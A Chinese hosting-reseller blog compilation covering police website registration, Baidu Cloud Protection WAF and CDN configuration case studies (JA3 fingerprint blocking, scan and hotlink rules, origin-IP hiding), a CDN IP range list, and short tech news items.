这几天百度有收到百度云的公安备案通知,很多人都不知道如何备案,今天主机吧就来教大家如何做公案备案。 公安备案前准备工作 1.在 “下载中心” 下载互联网站安全服务平台操作指南。 2.阅读并了解公安备案操作流程,准备公安备案申请所需的信息。 注册及实名认证 在完成公安认证前,需要在全国公安机关互联网站安全管理服务平台进行账户注册和登录。 1.在全国公安机关互联网站安全管理服务平台,点击联网备案登录。 2.在联网备案登录页面,网站用户类目下,进行注册和登录。 填写开办者主体信息 在左侧开办主体管理,选择开办的主体性质: 备注:开办主体性质选择个人或者单位。根据实际情况进行选择。 根据页面选择个人或者单位来填写个人信息。 网站开办主体为个人 开办主体性质选择为 “个人”:填写开办者信息后,单击提交审核。 注意需要上传证件正反面以及手持证件的照片。 网站开办主体为单位 开办主体性质选择为 “单位”:选择主办单位性质,填写主办单位信息和负责人信息,并单击提交审核。 注意需要上传单位证件照片,以及负责人证件正反面以及手持证件的照片。 填写新办网站信息 申请新办网站 当开办者信息提交完毕,处于公安审核状态中后,就可以点击在左侧导航栏中的新办网站申请,进入新办网站申请页面。 确认网站开办主体信息无误,单击下一步。 根据页面提示,填写网站基本信息,并单击下一步。 网站信息填写 网站开通日期:首次备案通过日期。您可在工信部网站的公共查询处获取审核通过时间。 域名证书:百度云域名证书可以在域名管理列表中生成域名证书,其它服务商请前往服务商域名管理后台获取。 从域名:能访问该网站的其它域名。 IP:填写您备案云服务器的 IP 地址,IP 地址可以在云服务器控制台进行查询。 注意:填写IP地址后一定要点击添加。 网络接入服务商 可以点击查询网络接入服务商,并搜索您的主机购买公司。 如果您的云主机是在百度云购买,请搜索百度,并选择北京百度网讯有限公司。接入方式选择租赁主机。 如果您购买的是百度云其他产品,请提交工单咨询客服。 域名注册服务商 可以通过whois查询您的域名注册服务商,并通过查询域名注册服务商来填写具体的用户信息。 如果您的域名是百度云注册,各域名注册服务商地址如下: 厦门商中在线科技股份有限公司:厦门市思明区观音山商务区高雄路18号通达国际中心5楼 北京新网互联软件服务有限公司:北京市海淀区后屯路28号1号楼KPHZ国际技术转移中心210室 北京新网数码信息技术有限公司:北京经济技术开发区地盛西路1号数码庄园B1座三层 泛亚信息技术江苏有限公司:无锡市凤宾路100号无锡总部商务园泛亚大厦 江苏邦宁科技有限公司:南京市雨花大道2号邦宁科技园3层 服务类型 根据用户自己情况选择填写。 若不涉及,请将 “是否提供互联网交互服务” 选择为 “否”。 “开办主体性质” 为 “个人”:可选择博客/个人空间,若有其他类型内容可如实勾选。 “开办主体性质” 为 “单位”:请根据实际情况勾选。 互联网危险物品信息发布 请按照网站涉及范围如实勾选。如果涉及互联网危险品信息发布,需要上传相应的资质证明文件以备核实。 相关前置许可 若您的 “开办主体性质” 为 “单位”,且有前置审批的项目,请如实填写。 网站语种 请根据实际情况,如实填写。 网站负责人信息填写 根据页面提示,填写网站负责人信息,并单击【下一步】。 “开办主体性质” 为 “个人”:可直接勾选同主体负责人后会自动填入。 “开办主体性质” 为 “单位”:请根据实际情况,如实填写相关联系人信息。 同意责任书并提交审核 阅读《互联网信息服务单位网络安全责任告知书》,勾选 “我已阅知上述告知事项,保证提交内容真实有效,承诺履行上述网络安全义务。”,单击【提交】。 审核信息通过 信息通过后,可以在全国互联网安全管理平台查询到如下内容。 公安备案介绍 ICP 备案成功后,您还必须为您的网站进行公安备案。 依据《计算机信息网络国际联网安全保护管理办法》相关规定,各网站在工信部备案成功后,需在网站开通之日起 30 日内登录全国公安机关互联网站安全管理服务平台提交公安备案申请。 公安备案审核通过后,您需在 30 日内登录全国公安机关互联网站安全管理服务平台,在您的已备案网站详情中,复网站公安机关备案号和备案编号HTML代码,下载备案编号图标,并编辑您的网页源代码将公安备案信息放置在网页底部。 公安备案指南 依据《计算机信息网络国际联网安全保护管理办法》相关规定,各网站在工信部备案成功后,需在网站开通之日起 30 日内登录全国公安机关互联网站安全管理服务平台提交公安备案申请。 了解公安备案操作流程请下载互联网站安全服务平台操作指南。 网站信息违规处理机制 请阅读全国公安机关互联网站安全管理服务平台 上相关政策法规。 根据网监部门规定,网站出现违规信息必须删除。如果您在百度智能云云服务器上托管的网站出现违规信息,百度智能云工作人员会立即通知您删除违规信息。如果您无响应,百度智能云将暂停您的服务器。 #### 使用百度云服务器BCC经验谈 之前主机吧发过几篇使用百度云虚拟主机的经历,总体一句话:垃圾!后来实在忍不了,就换了百度云服务器。目前用了快一个月了,主机吧来说说使用情况吧,大家如要购买百度云服务器可以做个参考。总在来说百度云服务器还是不错的,主机吧购买了普通型的2核4G2M配置,可能大家觉得4G内存有点大,其实不大,一个正常的网页服务器要装PHP、MYSQL等建站环境,启用后内存就肯定超1G的,再加上平时有点流量什么的,而且主机吧使用的还是wordpress程序,这种极其消耗内存的程序使得主机吧服务器平时内存使用就超过2G了,所以为了保证稳定性才使用了4G内存。总价格一年在1800左右,如果遇到活动期估计这个配置更便宜。使用了一个月非常稳定,主机吧网站使用了监控宝来监控的,一个次故障也没有。从上个月24号列换服务器以来 百度站长平台抓取异常工具再也没有出现过抓取异常的情况了速度方面打开都是1秒开,全完加速完毕大概要3秒左右,特别是移动访问方面速度有很大的提升。百度站长平台PC诊断访问速度达1秒以内百度站长平台诊断工具访问速在1秒左右百度站长平台抓取频率工具显示抓取时间平均在1000毫秒左右,速度相当快的 那么大家最关心的问题来了,使用百度云服务器是否对SEO有利?能否带来收录增加与流量增加?答案很明显:确实可以!从上个月24更换服务器以来网站收录有起有降,但整体收录是上升状态的,一个月不到收录增加了300左右,事实上主机吧更新并没有300这么多,那就说明了以前一些老地址也被百度加入收录了。流量方面已经从平均每天500IP左右,上升到了700IP左右,可以说得到了很大的提升,而且这些增加的流量基本都是从百度搜索得来的,从而我们得出一个结论使用百度云服务器确实可以增加流量!好了,以上就是主机吧使用百度云服务器BCC的一些新得了,希望可以帮到大家,如有什么问题可以留言,主机吧都会一一回复的。  #### 使用百度云防护 JA3 指纹功能成功解决某政府网站被刷流量问题 最近,主机帮一个多年用户联系上主机帮,表示他们手上的一个政府网站被刷流量,导致服务器带宽一直满状态,访问卡慢,想上百度云防护看能不能解决。 别的产品主机帮不清楚,百度云防护确实可以解决被刷流量问题,原因很简单,百度云防护不仅智能的CC防护策略,同时还支持各类匹配条件的自定义拦截功能,其中对拦截效果最有帮助的是JA3指纹拦截。 说到JA3指纹,普通站长可能不知道,这里我们说明下: JA3 指纹是一种用于识别 TLS 客户端的“数字指纹”技术。它通过提取客户端在 TLS 握手阶段发送的 Client Hello 报文中的五个关键字段: TLS 版本 支持的加密套件(Cipher Suites) TLS 扩展列表(Extensions) 支持的椭圆曲线(Elliptic Curves) 椭圆曲线点格式(Elliptic Curve Formats) 将这些字段按顺序拼接成一个字符串,并对其进行 MD5 哈希计算,最终得到一个 32 位的哈希值,这就是 JA3 指纹 。 JA3 指纹的核心特点: 唯一性:不同的客户端(如 Chrome、Firefox、Python 请求库、恶意软件)由于使用的 TLS 参数组合不同,会生成不同的 JA3 指纹。 稳定性:只要客户端的 TLS 配置不变,即使 IP 地址变化,其 JA3 指纹也不会改变。 用途广泛:常用于恶意软件检测、僵尸网络识别、网络流量分析、反爬虫机制等场景 。 想要使用JA3 指纹拦截需要网站部署SSL证书,刚好客户政府网站是部署有SSL证书的。 我们通过接入百度云防护后,开启了智能CC防护功能。 由于怕误杀,客户只设置了宽松模式。 依然拦截了一堆的高频访问IP 不过虽然拦截了一些高频IP访问了,但依然流量很高,云防护消耗的流量飞快,接入1小时就消耗了十几G流量,作为一个政府网站,这是不正常的。 然后通过百度云防护日志查看,发现一个JA3指纹为:8ab05683f2e4dd948638ab312a972f44 大量访问了网站的图片资源,而且该JA3指纹明明是同一台机器,但却采用了大量不同的IPV6 IP进行访问网站,由此可以判断这是一个刷流量的机器在访问我们网站。 解决办法很简单,进入自定义规则功能-添加规则,添加规则如下图: 然后我们再进入攻击详情-自定义规则查看拦截情况。 果然拦截了一大堆IPV6的访问,通过查询这些IPV6的地址发现,这些IP地址都是广东各地的,可以判断应该是广东的某些代理IP服务进行刷流量行为,但其服务器并没有更换,所以无论怎么更换IP,他的JA3指纹都是不变的,这给了我们很好的拦截特征。 拦截后,流量消耗果然大降了,本次刷流量拦截成功! 目前客户网站两天只用了45G流量。 至于为什么有人会刷政府网站的流量,这点主机猜测可能跟PCDN有关,一些PCDN用户会故意“刷”静态文件(尤其是大文件),目的之一就是为了躲避运营商的“跨省结算”检查,这是一种“上有政策,下有对策”的规避行为。 下面是详细解释: ✅ 背景:什么是“跨省结算”? 运营商内部有省间结算机制,即不同省份之间的流量需要按规则结算费用。 如果某个省的用户频繁访问外省资源,该省运营商可能需要向外省支付费用。 而 PCDN 的流量往往跨省传输频繁,导致运营商结算成本上升,因此成为重点监管对象。 ⚠️ PCDN 用户为何要“刷下行流量”? 运营商判断一个家庭宽带是否违规用于 PCDN,关键指标之一是“上传/下载比例”: 正常用户:下载远大于上传(比如 5:1) PCDN 用户:上传远大于下载(比如 1:5),因为他们在“分发内容” 为了掩盖这种异常比例,一些 PCDN 用户会: 主动大量下载大文件(如 .zip、.iso、.mp4),人为拉高“下行流量”,让上传/下载比例看起来“正常”。 他们是怎么刷的? 目标站点:优先选择提供大文件下载的静态网站(如镜像站、软件站、开源项目站) 请求特征: 只下载大文件,不访问网页 User-Agent 异常(如 Go-http-client、okhttp) IP 来源分散,多为家庭宽带 请求时间集中在晚上(PCDN 上传高峰时段) ✅ 总结一句话: 一些 PCDN 用户为了逃避运营商对其“上传异常”行为的识别,会故意刷静态大文件来“制造下行流量”,从而伪装成普通用户,躲避跨省结算检查和封号风险。 如果你网站的静态资源(尤其是大文件)被频繁、异常地下载,而你又不是热门下载站,那很可能就是被拿来“刷下行”了。建议: 开启 CDN 缓存,减少回源 设置防盗链或 Token 验证 封禁异常 UA 或 IP 段 或者使用百度云防护,对JA3指纹进行拦截,这样即使对方再多的IP也无法刷到你的网站流量。 #### 使用百度云防护WAF拦截复杂带参数链接操作方法 最近,有位客户想要拦截类似于以下链接 www.zhujib.com/index.php?c=plus&a=search&sp=m=1014&key=%E5%AE%89%E4%B9%83%E8%BF%91&x=12&y=15 想包含c=plus&a=search的请求拦截了。 这里我们可以利用百度云防护的自定义访问策略功能中URI和Get param策略进行拦截。 以下是使用 WAF 拦截包含 c=plus&a=search 的请求的设置方法: 基于 URI 策略设置 : 创建自定义访问策略规则 :登录 百度云防护 管理页面-Web防护-Web防护规则,在对应的防护策略中找到自定义策略规则设置选项,点击添加规则。 设置匹配条件 :在匹配条件中,将 URI 设置为匹配类型,匹配模式可选择 “包含”,然后在匹配值中输入 /index.php ,因为根据 URL https://www.zhujib.com/index.php?c=plus&a=search&sp=m=1014&key=%E5%AE%89%E4%B9%83%E8%BF%91&x=12&y=15 可知,这部分 URI 是固定的,包含目标参数的请求都会以 /index.php 开头。 设置参数匹配 :同时,添加一个 GET 参数匹配条件。匹配类型选择 “参数名”,匹配模式选择 “等于”,参数名输入 c ,参数值输入 plus ;再添加一个匹配条件,参数名输入 a ,参数值输入 search ,并且将这两个 GET 参数匹配条件设置为 “与” 的关系,确保只有同时满足 c=plus 和 a=search 时才会触发规则。 设置防护动作 :将防护动作设置为 “拦截”,或者拦截追加封禁时间,最后保存规则并启用该策略。 基于 GET 参数策略设置 : 创建参数过滤规则 :在 WAF 的参数过滤或类似功能模块中创建新规则。 指定参数名称和值 :明确指定要过滤的 GET 参数名称为 c 和 a ,对应的值分别为 plus 和 search ,设置匹配条件为参数值包含指定值。 配置阻断动作 :当检测到请求中包含这两个参数且值匹配时,执行阻断操作,如直接拒绝请求或重定向到指定的错误页面等,保存并应用该规则。 完成上述设置后,WAF 会根据配置的策略拦截包含 c=plus&a=search 的请求,防止其访问目标网站。需要注意的是,在配置过程中要确保规则的准确性,以免误拦截正常请求,并且要根据实际情况定期检查和调整 WAF 策略,以应对不断变化的威胁。 #### 使用百度云防护Web应用防火墙拦截扫描asp文件入侵 最近,主机帮有位客户网站经常被一些莫名奇妙的请求,会出现大量请求网站不存在的文件以试图达到某种入侵的目的,如网站本身使用php的,黑客会扫描一些.asp、.rar后缀的文件。 为解决这个问题,我们使用了百度云防护的自定义访问策略,功能在-Web防护规则-创建Web防护规则(如已创建关联可直接修改已创建规则) 找到自定义访问策略功能,开启,并添加策略 添加策略如下: 名称:asp拦截 策略:URI 后缀匹配 .asp 阻断并追加封禁:1440 点确认,并保存策略,关联实例即可。 这样做可以让访问.asp后缀的IP,会被封禁1440分钟,让黑客无法进行一步扫描。 如果黑客经常扫描你别的后缀文件的,也可以针对性拦截。 百度云防护的web防火墙可操作性非常强,大家可以根据自己网站的情况针对性设置拦截规则,主机帮使用一年多的经验来看,百度云防护的web规则自定义功能几乎可以满足90%的拦截需求。 #### 使用百度云防护为深圳某电子厂官网成功拦截CC攻击 今天,一位老板联系上了主机帮,咨询主机帮网站被DDOS攻击了怎么办? 在经过详细了解后,发现该客户网站使用的还是西部数码的独享型虚拟主机 虚拟主机虽然带宽没问题,但CPU内存配置是硬伤,面对CC攻击,一但有些请求无法识别,就会导致虚拟主机卡死,网站无法打开。 不过客户网站是深圳某电子厂的官网,已经做很久了,攻击应该不大,所以我们还是建议客户使用百度云防护,百度云防护不仅价格便宜,而且集成安全加速一体,非常适合中小网站做长期防护。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 在给客户简单接入后,并开启智能CC 严格模式 等5分钟后,百度云防护识别CC攻击,并开启自动拦截。 网站恢复了稳定,西部数码虚拟主机也不再提示DDOS攻击。 该网站一直处理被CC攻击状态 两个小时恶意请求7万多次。 攻击源于广东IP为主,极有可能是同行攻击行为。 百度云防护都成功拦截,目前网站稳稳运行。 #### 使用百度云防护信息泄漏保护功能拦截黑客扫描网站资源 百度云防护的隐私防护功能上线有一段时间了,不过主机帮看了下,使用的站长很少,原因可能是因为不会用,也可能认为用不着。 今天主机帮这里说一个使用案例,这为客户的服务器经常出现CPU爆满的情况,原因是因为有黑客经常扫描他的域名,访问一些不存在的文件,如zhujib.com/bak.zip、zhujib.com/www.rar、zhujib.com/admin.php等等,这些网站路径其实在网站中并不存在的,但是被黑客利用工具扫描后,会大量反馈404,对服务器造成不小的压力。 那么我们可以利用百度云防护的信息泄漏保护功能,对些行为进行拦截。 进入创建Web防护规则,开启信息泄漏保护,并创建策略 策略名:404拦截 匹配条件:响应码 包含:404 取消并且 阻断类型:拦截 确认。 添加规则成功后,我们再来看效果,有黑客扫描后,一但反馈404状态码,百度云防护就会拦截,而不会返回服务器。 效果非常好,客户网站也稳定中,如果你网站也经常被扫描的,可以尝试设置下。 #### 使用百度云防护后百度索引连涨 这个真没吹牛,主机吧使用百度云防护是上个月月初的事了,自从使用后,百度站长平台索引量疯涨! 不过,这些索引量增加并没有给网站搜索引擎带来多大流量,甚至可以说没有流量,看来百度索引量增涨对网站流量并没有直接体现,估计未来会有,但短期内主机吧看不到任何用处。 SEO是一个持之以恒的东西,主机吧网站运营了十来年了,有顶峰过,也有没落过,目前并不是最差的时候。 #### 使用百度云防护成功拦截住峰值700万超大CC攻击 自百度云防护新版CC防护功能升级以来,主机帮一直没机会看CC攻击的防御效果,不过今天效果出来了,前两天接入的一位客户遭遇了严重的CC攻击,接入百度云防护后,成功拦截了。 客户通过智能CC防护模式+自定义CC防护,成功拦截了12,734,891次CC攻击,峰值达700万次,这攻击量已经属于超高的CC攻击了,百度云防护稳稳的防下来了。 客户网站丝毫没有受到影响,可见百度云防护防御效果是非常不错的!如果您也有CC攻击防护需求,可以联系主机帮购买百度云防护。 #### 使用百度云防护拦截网站被恶意访问的效果 近日,有位站长联系上主机吧,表示网站被恶意访问,服务器带宽占满,CPU飙升100%。 查看网站请求日志发现访问频率不高,但每隔一段时间就会出现大量访问,而这些访问的IP、ua都不同,访问的url也不同,很难通过特征拦截这类恶意请求。 不过,百度云防护近期上线了JA3 限定规则,该规则是通过识别TLS指纹来对客户端进行识别,TLS 指纹(TLS Fingerprint)是一种被动识别客户端身份的技术,它通过分析客户端在 TLS 握手阶段发送的ClientHello 数据包中的各种字段组合,生成一个唯一的“指纹”值(通常是哈希),用来标识特定的客户端软件或工具。 举个例子 当你用 Chrome 浏览器访问一个 HTTPS 网站时,Chrome 会发送一个 ClientHello 数据包,里面包含: 支持的 TLS 版本 加密套件列表(如 TLS_AES_128_GCM_SHA256) 扩展字段(如 server_name, supported_groups, application_layer_protocol_negotiation) 扩展顺序和长度 这些字段的组合几乎是独一无二的,就像人的指纹一样。 如果大量请求的 TLS指纹 指纹相同,可能是同一批爬虫工具发起。 百度云防护的JA3 限定规则就是针对这个TLS指纹的限制,达到限制爬虫的目的。 因为如 Python 的 requests 库、Selenium、Playwright 等工具的 TLS 指纹与真实浏览器不同的。 我们给这位客户网站接入百度云防护后,果然拦截了一大堆JA3 限制规则。 通过拦截日志我们可以看到,拦截的恶意访问URL地址不同、UA不同、IP也不同,传统的特征识别根本无法正常处理,因为这些单IP不仅访问频率低,URL网址同一个地址访问频率也很低,连浏览器UA也不同。 但其实他们都是来自同一个客户端的请求,所以在百度云防护的JA3 限定规则里,是会被拦截的。 #### 使用百度云防护自定义规则实现防盗链效果 有小伙伴想利用百度云防护实现防盗链效果,其实操作方法很简单,进入百度云防护控制台-web防护-自定义规则-添加规则 具体规则如下图: 规则名:防盗链 匹配条件:Referer 不包含任意一值 输入你的网站域名 添加且条件 URI 包含多值之一 输入.jpg .png .zip .mp4 等你希望被盗链的网站资源后缀。 处置动作:拦截 选定好防护域名 这样,你就会得到效果是:只要不是从你网站域名来源的图片等资源,都无法正常访问。 #### 使用百度广告联盟反屏蔽不显示广告原因分析 最近有一客户启用百度广告联盟反屏蔽功能后,广告不显示,这里主机吧来给大家做个分析。按照开启反屏蔽联盟开启对网站有如下几个要求: a.反屏蔽需要两个未使用过且主域名相同的二级域名(未使用过指未曾使用该域名设置反屏蔽) b.反屏蔽域名的主域不必和站点一致 c.保证反屏蔽域名接入联盟前,未在百度云加速注册使用(注册在同名联盟帐号下的除外)。如域名已接入百度云加速,而且不是在联盟帐户上的,请删除后,再重新设置反屏蔽。设置成功后如需要开通云加速的,必须在同联盟帐户上添加 d.保证反屏蔽域名在使用期间ICP备案,且无色情、暴力等违规内容 e.反屏蔽域名中不能包含bank、test、pay、union、ad等敏感词 f.网站启用HTTPS,而反屏蔽域名默认推送是云加速免费版,不支持HTTPS,需要用联盟帐号登陆百度云加速,添加域名并购买收费版,在云加速启用HTTPS即可。 好了,以上就开启百度反屏蔽联盟不显示广告的全部原因,其中主机吧遇到最多的是C条,很多在主机吧这边开通的云加速域名,再开反屏蔽是不行的,因为代理开通的域名其实是在代理帐户上分配过去的,并不是在你的联盟帐户上开通,从而导致无法显示。如果客户需要开反屏蔽的,请先跟这边说明下,这边好直接通过您自己的帐户开通。 F条也挺多用户遇到的,网站启用HTTPS后,广告联盟就不显示了,其原因是因为百度联盟推送至百度云加速后,域名默认是免费版的,免费版是不支持HTTPS的,所以反屏蔽域名失效了。解决办法是购买个专业版的就可以了,需要用联盟帐户登陆云加速,添加购买,购买后还需要在云加速启用HTTPS。 #### 使用的七牛云云存储做的图床,七牛云的https cdn加速是收费的 可以继续使用他家的云存储,然后使用百度云防护cdn加速可以吗 问:使用的七牛云云存储做的图床,但是七牛云的https cdn加速是收费的而且没有上线,可以继续使用他加的云存储,然后使用你家的cdn HTTPS加速可以吗? 答:可以的,只需要在子域名配置的时候,开启HTTPS转发,回源端口写80,协议HTTP,并上传部署SSL证书即可通过百度云防护转发云存储的HTTP #### 使用阿里云腾讯云CDN的站长注意啦:不使用一样会被攻击 事情是这样的,最近主机吧接了一位APP防御的客户,客户之前使用的是腾讯云的CDN,被攻击后,产生大量的费用,于是就联系上了主机吧帮忙防御。 主机吧帮客户简单配置下高防IP,并让他直接把域名解析至高防IP后,APP访问就正常了,而且后期攻击也没什么问题,也没怎么管理。 直至今天早上,客户咨询主机吧,APP是不是又被攻击了? 主机吧一看,确实有攻击,但都是被高防IP拦截了的,也没有超量的情况。 了解后才得知,原来是客户的腾讯帐号又收到了计费单,他的腾讯云CDN又产生了一笔费用,高达上千块。 主机吧一想,不对啊,客户的域名都已经从腾讯云CDN换到这边高防IP上了,域名访问都已经不经过CDN了,怎么可能还被计费呢? 后来,查询才知道,原来客户在腾讯云CDN的域名并没有关掉,域名一直处在生效状态。那么通过腾讯CDN的IP还是一样可以正常请求APP的,这样的话只要黑客一直通过腾讯云CDN节点请求域名腾讯就会计费。 得知原因后,我们让客户直接把腾讯云CDN的域名停用了。 第二天,果然没有再收到计费单了。 这里也给各位站长提个醒,使用后付费的CDN,不使用的时候一定要关了,以免被不法份子钻漏洞刷你的CDN流量,比如阿里云、七牛云也是这样。 #### 使用阿里云腾讯云服务器需要防止暴力破解 最近,在帮一位站长做防御的时候,站长反馈服务器被攻击了,主机吧查看高防IP后,发现高防IP并没有受到攻击,难道源服务器IP暴露了? 在咨询后才知道,原来是源服务器的22端口被扫描了。 这就很奇怪了,因为服务器IP是新换的,原来的黑客不可能知道IP是多少的,如果知道源服务器IP的话,早就攻击源服务器IP了,何必攻击高防IP呢? 所以我们猜测,这是阿里云的服务器IP被人用机器扫了,甚至尝试破解,跟主机吧去年腾讯云服务器被破解的经历一样,说白了,就是像阿里云、腾讯云这种大型网络服务商,其IP段都是经常有机器在扫的,一但被扫到,会尝试破解,一但破解成功,得到控制权,要么服务器成为肉鸡,这也是为什么有些DDOS、CC攻击是来自阿里云、腾讯云的原因;要么网络被挂马,主机吧网站去年就是被上传了文件。 所以,为了服务器安全,我们一定要把一些对外的端口进行关闭,比如22Linux远程端口、21FTP端口、3306mysql端口、3389windows远程登陆端口等,如果服务器没有运行网站业务的话80、443端口也要关闭,这样可以避免掉90%的黑客破解。 #### 使用阿里云邮件推送接入不了邮箱原因 阿里云邮箱推送功能估计很多站长没用过,这是一种有区别于企业邮箱的服务,用得最多的是网站注册的时候邮箱验证发送验证码服务。好处在于被拦截几率很低,而且稳定,不像腾讯企业邮箱,经常会提示邮箱发送垃圾信息不成功。主机吧就遇到过,所以就换了阿里云邮箱推送服务。免费的!每天限制200封邮箱,一般的网站够用了,收费的也不贵,5万封邮箱80块。主机吧刚接入的邮箱推送的时候,遇到一个问题,明明域名验证都通过了,可是网站发送邮箱就是失败。后来检查才知道原来是根域名@记录本来解析有腾讯的邮箱了,所以子域名解析MX记录会导致发送邮箱失败。所以主机吧直接把域名根域名@的MX记录删了就可以正常发送了。  #### 使用高防CDN隐藏服务器IP却总被查到源服务器 最近,主机帮接了一位客户接入百度云防护,服务器更换了新IP,用了百度云防护CDN隐藏起来,结果没两天服务器又被DDOS了。 主机帮在确认新换的IP没有使用过后,域名也没有解析暴露过IP的情况下,我们通过censys查询域名,发现居然可以轻松的查到源服务器IP。 原来是客户的源服务器在部署SSL证书的时候泄漏了源服务器IP,在某些情况下,服务器IP如果没有部署SSL证书的话,会默认把服务器的第一个网站的SSL证书部署到IP上,这个时候用HTTPS访问服务器IP,就会暴露出这个IP绑定了哪个域名。 而censys就是利用了这个原理,来反查域名源服务器IP,一般来说如果没有做特殊设置的话,基本都是一查一个准。 考虑到客户不懂设置SSL,我们直接让客户把源服务器的SSL都下了,然后通过百度云防护HTTPS转发HTTP即可实现SSL部署效果,这样设置类似于百度云加速以前的半程加密。 成功部署后,果然查不到最新换的IP了。 以前的宝塔面板后台没有部署SSL的时候,就会出现CDN暴露IP的情况,目前宝塔都是可以设置SSL了,安全多了。 #### 使用高防IP 网站访问出现重定向过多原因 最近,有客户反馈使用我们的高防IP时,网站访问出现重客向过多的问题。 这里我们来说明下原因: 出现这个问题一般是网站源服务器做了HTTPS强制跳转,而高防IP又设置了HTTPS强制跳转,导致出现重定向过多。 解决办法是:进入高防IP-网站防护-编辑 取消强制访问 HTTPS即可。 #### 使用高防IP高防CDN部分地区出现502现象原因 最新一位客户购买了我们的高防IP,接入后一开始正常的,过了段时间后,反馈大部分地区出现502的现象。 主机吧联系技术查看,技术查了很久也没查出问题,反馈高防IP是正常的。 于是我们让客户查下是否服务器里的防火墙拦截了高防IP的回源请求。 查询后确实有拦截高防IP的行为,于是把高防IP加白后,正常了一会,又出现了502。 后来我们才发现原来是客户只把高防IP的输出IP加白而以,并没有把回源IP加白,一般高防IP回源IP都是一个段位的,需要把整个IP段加白才可以。 所以客户加把整个IP段加白,网站马上正常了。   在这里提醒各位客户如果网站有防火墙或者使用高防服务器的,一定要关掉防火墙或者把转发节点的IP段全部加白,大多数出现502现象的都是源服务器拦截回源IP所致的。 主机吧发现使用百度云加速的用户只把百度云加速的部分节点加白而以,并没有全部加白名单,导致反馈部分地区出现502。记住一定要把全部IP段加白,百度云加速很多回源IP都是不展示出来的,不要只看表面的IP加白。 百度云加速全部IP段 天津 111.32.135.0/24 111.32.136.0/24 125.39.174.0/24 125.39.239.0/24 42.81.6.0/24 42.81.8.0/24 重庆 119.84.92.0/24 119.84.93.0/24 113.207.100.0/24 113.207.101.0/24 113.207.102.0/24 上海 180.163.188.0/24 180.163.189.0/24 101.227.206.0/24 101.227.207.0/24 180.163.113.0/24 青岛 119.167.246.0/24 150.138.149.0/24 150.138.150.0/24 150.138.151.0/24 河北 61.182.137.0/24 61.182.136.0/24 120.52.29.0/24 120.52.113.0/24 广州 183.232.51.0/24 183.232.53.0/24 157.255.25.0/24 157.255.26.0/24 江苏 112.25.90.0/24 112.25.91.0/24 58.211.2.0/24 58.211.137.0/24 苏州 61.155.149.0/24 61.156.149.0/24 61.155.165.0/24 佛山 183.60.235.0/24 116.31.126.0/24 116.31.127.0/24 湖南 59.51.81.0/24 220.170.185.0/24 220.170.186.0/24 东莞 183.61.236.0/24 14.17.71.0/24 119.147.134.0/24 西安 117.34.13.0/24 117.34.14.0/24 郑州 42.236.93.0/24 42.236.94.0/24 沈阳 124.95.168.0/24 124.95.188.0/24 湖北 122.190.2.0/24 122.190.3.0/24 广东 183.61.177.0/24 183.61.190.0/24 杭州 117.148.160.0/24 117.148.161.0/24 南宁 222.216.190.0/24 219.159.84.0/24 宁波 115.231.186.0/24 115.231.187.0/24 济南 119.188.97.0/24 119.188.9.0/24 福州 117.27.149.0/24 上海 163.53.89.0/24 国外IP段 173.245.48.0/20 103.21.244.0/22 103.22.200.0/22 103.31.4.0/22 141.101.64.0/18 108.162.192.0/18 190.93.240.0/20 188.114.96.0/20 197.234.240.0/22 198.41.128.0/17 162.158.0.0/15 104.16.0.0/12 172.64.0.0/13 131.0.72.0/22 #### 促进互联互通:淘宝接入京东物流,京东接入支付宝 9 月 26 日消息,据“晚点 LatePost”今天下午报道,淘宝天猫即将正式接入京东物流,预计于 10 月中旬上线,此后淘天商家在系统中选择商品寄送方式时,将多一个京东物流的选项。 与此同时,京东也将接入菜鸟速递和菜鸟驿站 —— 两者分别是菜鸟的自营快递品牌和代收包裹的站点。京东也将正式接入支付宝支付,预计在双 11 前夕推出。目前消费者在京东下单,默认的支付方式排序依次为京东支付、云闪付、微信支付等。 这是阿里和京东两个电商平台成立 20 多年来,最大程度的一次握手。报道称,多年来两家公司互相对抗、提防,用流量、佣金、补贴等争夺商家和消费者,营销舆论互相呛声,各自都建立起了物流、支付等高墙垒垒的独立体系,一路竞争,又一起长大,然后在前几年遇上了更年轻的共同对手。 无独有偶,淘宝也将在本月底全面接通微信支付。据IT之家此前报道,淘宝客服方面称,商家分批开通完毕后消费者端将全量上线微信支付,“目前我们正在推进商家们分批开通中,同时消费者侧也在逐步开放试用中,还请您耐心等待,根据节奏,预计全量消费者可以在 9 月底前使用微信支付。” #### 俄罗斯2025 年开始禁止国家重要基础设施部门使用外国软件 据央视财经报道,当地时间 3 月 30 日,俄罗斯总统签署保障技术独立性的总统令,要求从 3 月 31 日起禁止在国家采购中未经相关部门许可为重要国家基础设施部门购买外国软件。 从 2025 年开始,国家重要基础设施部门将完全禁止使用外国软件。 该禁令于 2025 年 1 月 1 日生效。在此日期之前,关键基础设施的所有者必须改用俄罗斯软件。 还有消息称,俄罗斯政府将“平行进口”“合法化”:“未经版权所有者许可”的商品可进行销售。该清单将包括电影、音乐、软件和“发明”等知识产权。 #### 俄罗斯网络“劫持”了 Twitter 流量 2022年3月28日,一家俄罗斯电信运营商在两个多小时内短暂地通告自己是推特流量的目的地,这可能是一起意外事件,也可能是一起企图劫持流量的事件。全球知名的IT网络安全培训组织SANS Institute的Johannes Ullrich所说:“今天早些时候,RTComm.ru开始通告104.244.42.0/24,这是推特所使用的前缀。”Ullrich指出:“劫持BGP前缀是阻止访问的一种方式,但它也可以用来拦截发送到相应IP地址的流量。”路由劫持机制使用边界网关协议(BGP),路由器通过该机制来分发关于可以通过它们到达哪些网络的信息。BGP是一种历史悠久的协议,于1990年首次发布。BGP与许多互联网的基础协议一样,设计当初并未考虑到安全性。美国联邦通信委员会(FCC)在2月下旬宣布对路由漏洞开展调查时所声称:“不法的网络威胁分子可能有意伪造BGP可达性信息,以便将流量重定向到自己或通过特定的第三方网络重定向流量,阻止流量到达预期的接收方。”互联网分析公司Kentic的Doug Madory在推文中指出,万幸的是,推特使用了一种名为资源公钥基础设施(RPKI)的保护机制。 他说:“由于宣称AS13414的RPKI ROA[路由授权]是合法来源,这起劫持并没有传播太远。”APNIC解释,RPKI“提供了一种将互联网编号资源信息(比如IP地址)连接到信任锚(trust 